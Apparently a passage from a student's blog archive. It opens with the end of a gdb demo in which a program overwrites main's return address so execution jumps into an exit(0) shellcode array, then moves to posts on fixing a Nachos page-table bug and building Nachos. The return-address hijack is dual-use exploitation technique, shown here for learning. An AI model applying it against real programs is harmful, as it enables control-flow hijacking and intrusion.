<span style="color: green;">0x080482cd</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+13</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">jmp</span> <span style="color: #e34adc;">0x80482eb</span> <span style="color: #808030;"><</span>main<span style="color: #808030;">+</span><span style="color: #008c00;">43</span><span style="color: #808030;">></span>
<span style="color: green;">0x080482cf</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+15</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">lea</span> <span style="color: #808030;">-</span><span style="color: green;">0x4</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span><span style="color: #808030;">)</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span>
<span style="color: green;">0x080482d2</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+18</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> <span style="color: #808030;">-</span><span style="color: green;">0x8</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span><span style="color: #808030;">)</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">edx</span>
<span style="color: green;">0x080482d5</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+21</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">shl</span> $<span style="color: green;">0x2</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">edx</span>
<span style="color: green;">0x080482d8</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+24</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">add</span> <span style="color: #808030;">%</span><span style="color: navy;">edx</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span>
<span style="color: green;">0x080482da</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+26</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> <span style="color: #808030;">%</span><span style="color: navy;">eax</span><span style="color: #808030;">,</span><span style="color: #808030;">-</span><span style="color: green;">0x4</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span><span style="color: #808030;">)</span>
<span style="color: green;">0x080482dd</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+29</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> <span style="color: #808030;">-</span><span style="color: green;">0x4</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span><span style="color: #808030;">)</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span>
<span style="color: green;">0x080482e0</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+32</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> $<span style="color: green;">0x80ce028</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">edx</span>
<span style="color: green;">0x080482e5</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+37</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> <span style="color: #808030;">%</span><span style="color: navy;">edx</span><span style="color: #808030;">,</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span><span style="color: #808030;">)</span>
<span style="color: green;">0x080482e7</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+39</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> addl $<span style="color: green;">0x1</span><span style="color: #808030;">,</span><span style="color: #808030;">-</span><span style="color: green;">0x8</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span><span style="color: #808030;">)</span>
<span style="color: green;">0x080482eb</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+43</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> cmpl $<span style="color: green;">0x9</span><span style="color: #808030;">,</span><span style="color: #808030;">-</span><span style="color: green;">0x8</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span><span style="color: #808030;">)</span>
<span style="color: green;">0x080482ef</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+47</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">jle</span> <span style="color: #e34adc;">0x80482cf</span> <span style="color: #808030;"><</span>main<span style="color: #808030;">+</span><span style="color: #008c00;">15</span><span style="color: #808030;">></span>
<span style="color: green;">0x080482f1</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+49</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> $<span style="color: green;">0x0</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span>
<span style="color: green;">0x080482f6</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+54</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">leave</span>
<span style="color: green;">0x080482f7</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+55</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">ret</span>
<span style="color: #004a43;">End</span> of assembler dump.
<span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> b <span style="color: #808030;">*</span><span style="color: #808030;">(</span>main<span style="color: #808030;">+</span><span style="color: #008c00;">55</span><span style="color: #808030;">)</span>
Breakpoint <span style="color: #008c00;">1</span> <span style="color: #004a43;">at</span> <span style="color: green;">0x80482f7</span><span style="color: #808030;">:</span> file exit_shell.<span style="color: #004a43;">c</span><span style="color: #808030;">,</span> line <span style="color: #008c00;">12</span>.
<span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> r
Breakpoint <span style="color: #008c00;">1</span><span style="color: #808030;">,</span> <span style="color: green;">0x080482f7</span> <span style="color: maroon; font-weight: bold;">in</span> main <span style="color: #808030;">(</span><span style="color: #808030;">)</span> <span style="color: #004a43;">at</span> exit_shell.<span style="color: #004a43;">c</span><span style="color: #808030;">:</span><span style="color: #008c00;">12</span>
<span style="color: #008c00;">12</span> <span style="color: #808030;">}</span>
<span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> ni
<span style="color: green;">0x080ce028</span> <span style="color: maroon; font-weight: bold;">in</span> shellcode <span style="color: #808030;">(</span><span style="color: #808030;">)</span>
<span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> x<span style="color: #808030;">/</span>4i $eip
<span style="color: #808030;">=</span><span style="color: #808030;">></span> <span style="color: green;">0x80ce028</span> <span style="color: #808030;"><</span>shellcode<span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> $<span style="color: green;">0x1</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span>
<span style="color: green;">0x80ce02d</span> <span style="color: #808030;"><</span>shellcode<span style="color: #808030;">+</span><span style="color: #008c00;">5</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> $<span style="color: green;">0x0</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">ebx</span>
<span style="color: green;">0x80ce032</span> <span style="color: #808030;"><</span>shellcode<span style="color: #808030;">+</span><span style="color: #008c00;">10</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">int</span> $<span style="color: green;">0x80</span>
<span style="color: green;">0x80ce034</span> <span style="color: #808030;"><</span>shellcode<span style="color: #808030;">+</span><span style="color: #008c00;">12</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">add</span> <span style="color: #808030;">%</span><span style="color: navy;">al</span><span style="color: #808030;">,</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span><span style="color: #808030;">)</span>
<span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> ni
<span style="color: green;">0x080ce02d</span> <span style="color: maroon; font-weight: bold;">in</span> shellcode <span style="color: #808030;">(</span><span style="color: #808030;">)</span>
<span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> ni
<span style="color: green;">0x080ce032</span> <span style="color: maroon; font-weight: bold;">in</span> shellcode <span style="color: #808030;">(</span><span style="color: #808030;">)</span>
<span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> ni
Program exited normally.</pre><span class="Apple-style-span" style="font-family: inherit;">The result is just what we expected: when main returns, the ret at main+55 pops the overwritten return address and execution continues at 0x80ce028, the shellcode array in .data. Its three instructions make the exit(0) system call, so the program exits normally.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">video demo is right here (using full screen is better):</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><a href="http://www.youtube.com/watch?v=I6iYFQl-3kk&feature=player_embedded#at=14">http://www.youtube.com/watch?v=I6iYFQl-3kk&feature=player_embedded#at=14</a></span><br />
<div class="separator" style="clear: both; text-align: center;"><br />
</div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-8187114676074626202011-06-29T03:45:00.000-07:002011-06-30T01:18:45.598-07:00nachos (cont.)After building and installing Nachos, the second project is to fix a bug in it.<br />
<br />
<b>Bug description:</b><br />
When Nachos runs two different executables, the result is wrong.<br />
The picture below shows what the bug looks like.<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-gQH0WEVYUvg/TgwW1h1vTkI/AAAAAAAAADs/_zQLjcqWgA4/s1600/project2_bug.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="237" src="http://1.bp.blogspot.com/-gQH0WEVYUvg/TgwW1h1vTkI/AAAAAAAAADs/_zQLjcqWgA4/s320/project2_bug.jpg" width="320" /></a></div><br />
<b>Finding the bug:</b><br />
Now that I know what the bug looks like, it's time to find out what causes it.<br />
Since our TA had told us that the bug may be in ./userprog/addrspace.h and ./userprog/addrspace.cc, my teammate and I started by working out what these two files do.<br />
<br />
<br />
<div style="font-family: 'Courier New', Courier, monospace;"><br />
</div><span class="Apple-style-span" style="font-family: inherit;">what we are interested are </span><br />
<span class="Apple-style-span" style="font-family: inherit;">1. AddrSpace::Load(), which will load the image into the physical addrspace.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">2. AddrSpace::AddrSpace, which is the constructor of this class, and will create the page table of this process.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
In AddrSpace::Load(), the following code copies the .text (code) and .data (initData) segments of the executable into physical memory:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if (noffH.code.size > 0) {</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> executable->ReadAt(</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">&(kernel->machine->mainMemory[<span class="Apple-style-span" style="color: red;">noffH.code.virtualAddr</span>]),</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">noffH.code.size, noffH.code.inFileAddr);</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> }</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if (noffH.initData.size > 0) {</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> executable->ReadAt(</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">&(kernel->machine->mainMemory[<span class="Apple-style-span" style="color: red;">noffH.initData.virtualAddr</span>]),</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">noffH.initData.size, noffH.initData.inFileAddr);</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> }</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">Loading is supposed to place the process's virtual address space somewhere in physical memory.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">However, as the red highlights show, the physical address used for the copy is exactly the virtual address of the process.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">So when a second process is loaded, it overwrites the first one. When the first process later restores its state and resumes, it executes code that belongs to the other process, not its own.</span><br />
Here we have most likely found our problem.<br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">But not so fast: before we modify the code and fix the bug, there is one more thing to be aware of.</span> Nachos uses paging to map virtual addresses to physical addresses, so when we change where a process is loaded we also have to change its page table. The mapping is built in the constructor, and as the code there shows it is a one-to-one linear mapping: virtual page i maps to physical frame i. That is why, when process 2 is loaded and process 1 then restores its state, process 1's page table still says its memory is in the old place, which process 2 has already overwritten. Moving the load alone is not enough; the page table has to point at the frames the process actually occupies.<br />
<span class="Apple-style-span" style="font-family: inherit;"><b><br />
</b></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Fixing the bug:</b></span><br />
<span class="Apple-style-span" style="font-family: inherit;">Now we have the information we need; it's time to modify the code and fix the bug.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">Our team's approach is to add a <b><span class="Apple-style-span" style="color: red;">static unsigned int variable</span></b> that <b><span class="Apple-style-span" style="color: red;">records how many physical frames are already in use</span></b>, so that when process 2 is loaded it is placed after process 1 instead of on top of it.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
1. First, add a static unsigned int member to addrspace.h:<br />
<br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">addrspace.h</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">class AddrSpace {</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> public:</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> .....</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span><br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> private:</span></div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> TranslationEntry *pageTable;</span></div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"></div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"> unsigned int numPages;</div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"> <span class="Apple-style-span" style="color: red;">static unsigned int usedPhys;</span></div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"> </div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"> bool Load(char *fileName);</div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"> void InitRegisters();</div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">};</div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><br />
</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">2. Initialize the static member in addrspace.cc:</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#include "addrspace.h"</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> <span class="Apple-style-span" style="color: red;">unsigned int AddrSpace::usedPhys=0;</span></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">3. Modify AddrSpace::Load() so the segment is copied to the first free frame instead of to mainMemory[virtualAddr]:</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">executable->ReadAt(</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">&(kernel->machine->mainMemory[noffH.code.virtualAddr<b><span class="Apple-style-span" style="color: red;">+</span><span class="Apple-style-span" style="color: blue;">128</span><span class="Apple-style-span" style="color: red;">*usedPhys</span></b><span class="Apple-style-span" style="color: red;"><b>]</b></span>),noffH.code.size, noffH.code.inFileAddr);</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">The initData segment is loaded by the ReadAt call right below this one, and it needs the identical <b>+128*usedPhys</b> offset; offsetting only the code segment would still drop process 2's data on top of process 1.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">P.S.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">Why multiply usedPhys by 128 before adding it to virtualAddr?</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">Because usedPhys counts page frames, not bytes. To turn it into a byte offset into mainMemory it has to be multiplied by the frame size, which in Nachos is 128 bytes per page (machine.h names this constant PageSize, so PageSize*usedPhys reads better than the literal 128).</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;"><br /></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">4. Remap the page table so that virtual page i points at frame i+usedPhys instead of frame i:</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">for (unsigned int i = 0; i &lt; <span class="Apple-style-span" style="color: red;">numPages</span>; i++) {</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;pageTable[i].virtualPage = i;</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;pageTable[i].physicalPage = i<span class="Apple-style-span" style="color: red;">+usedPhys</span>;</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">}</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">P.S.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">numPages is the number of page frames the current process needs. There is no need to map every frame of the machine again, only the ones this process uses.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">5. Record the frames that are now in use:</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;usedPhys += numPages;</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">P.S.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">Do this after steps 3 and 4, since both of them read usedPhys as the first free frame. Once it has been advanced, process 2 is loaded above process 1 instead of on top of it. Two caveats to keep in mind: a check that usedPhys + numPages does not exceed NumPhysPages should run before the load, otherwise a process that no longer fits is written past the end of mainMemory, and nothing ever decrements usedPhys, so frames are never reused when a process exits.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">6. the last steps is to compile the source code again and test the result.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;"><b>Result:</b></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div class="separator" style="clear: both; text-align: center;"></div><span class="Apple-style-span" style="font-family: inherit;"><b><br />
</b></span></div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-P5MkVIlBRUE/TgwW0tRHj0I/AAAAAAAAADo/HkDZ7xoCG2I/s1600/project2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="131" src="http://3.bp.blogspot.com/-P5MkVIlBRUE/TgwW0tRHj0I/AAAAAAAAADo/HkDZ7xoCG2I/s320/project2.jpg" width="320" /></a></div><br />
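Written in C rather than Nachos' C++, and added here as an example that is not part of the original post or of Nachos: the remap loop from steps 4 and 5 with the bounds check the original lacks, plus a check that two loaded processes share no physical frame. NUM_PHYS_PAGES is a constructed value (Nachos' own constant is NumPhysPages) and the function names are my own.<br />

```c
#include <stdbool.h>
#include <stdio.h>

/* Constructed value; Nachos defines the real one as NumPhysPages in machine.h. */
#define NUM_PHYS_PAGES 32

typedef struct {
    unsigned int virtualPage;
    unsigned int physicalPage;
    bool valid;
} TranslationEntry;

/* First physical frame not yet handed to any process (the post's usedPhys). */
static unsigned int usedPhys = 0;

/* Map a process's numPages virtual pages onto the next free physical frames.
 * Returns false and maps nothing when the frames would run past physical
 * memory; the loop in the post has no such check. */
bool remap_page_table(TranslationEntry *pageTable, unsigned int numPages)
{
    if (numPages > NUM_PHYS_PAGES - usedPhys)
        return false;
    for (unsigned int i = 0; i < numPages; i++) {
        pageTable[i].virtualPage = i;
        /* Without the +usedPhys offset every process would start at frame 0
         * and the second process loaded would overwrite the first. */
        pageTable[i].physicalPage = i + usedPhys;
        pageTable[i].valid = true;
    }
    usedPhys += numPages;
    return true;
}

/* True when two page tables share at least one physical frame, i.e. the two
 * address spaces are not isolated from each other. */
bool frames_overlap(const TranslationEntry *a, unsigned int na,
                    const TranslationEntry *b, unsigned int nb)
{
    for (unsigned int i = 0; i < na; i++)
        for (unsigned int j = 0; j < nb; j++)
            if (a[i].valid && b[j].valid && a[i].physicalPage == b[j].physicalPage)
                return true;
    return false;
}

int main(void)
{
    TranslationEntry p1[10], p2[12], p3[11];
    bool ok1 = remap_page_table(p1, 10);   /* frames 0..9 */
    bool ok2 = remap_page_table(p2, 12);   /* frames 10..21 */
    bool ok3 = remap_page_table(p3, 11);   /* 22 + 11 > 32: rejected */
    printf("p1 %s, p2 %s, p3 %s, overlap=%d, usedPhys=%u\n",
           ok1 ? "loaded" : "rejected", ok2 ? "loaded" : "rejected",
           ok3 ? "loaded" : "rejected", frames_overlap(p1, 10, p2, 12), usedPhys);
    return 0;
}
```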
</div>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-30020615827436007442011-05-26T08:36:00.000-07:002011-08-19T02:45:14.575-07:00building nachosMy operating systems final project came out recently. The project is to build Nachos and modify some of its source code to help us understand more about operating systems.<br />
<br />
However, the GCC version needed to compile the Nachos OS is pretty old (gcc 2.95). This is not good, since my environment is Ubuntu 10.10 and the gcc version under Ubuntu is 4.45 (way too new for building Nachos). Fortunately, the Nachos source code is not very long, so I modified some of the source code and the Makefile to get the build working.<br />
<br />
Here is how I did it:<br />
1. download the Nachos source code.<br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"><span class="SpellE">wget</span></span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"> </span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">http://neuron.csie.ntust.edu.tw/homework/99/os/materials/nachos-4.0.tar.gz</span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">2. download the MIPS cross-compile tool</span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"></span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"><span class="SpellE"> wget</span></span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"> </span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">http://neuron.csie.ntust.edu.tw/homework/99/os/materials/mips-decstation.linux-xgcc.gz</span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">3. move the MIPS cross-compile tool to the root directory</span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"> sudo mv </span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">mips-decstation.linux-xgcc.gz /</span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">4. extract the cross-compiler archive</span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"> sudo tar zxvf </span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">mips-decstation.linux-xgcc.gz /</span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">5. extract the Nachos archive</span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"> tar zxvf nachos-4.0.tar.gz</span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;">It's time to build the source.</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;"> cd ${nachos directory}/code</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;"> make</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;">After doing this, some problems pop up.</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;">First:</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;"> /bin/sh: gmake: not found</span></span><br />
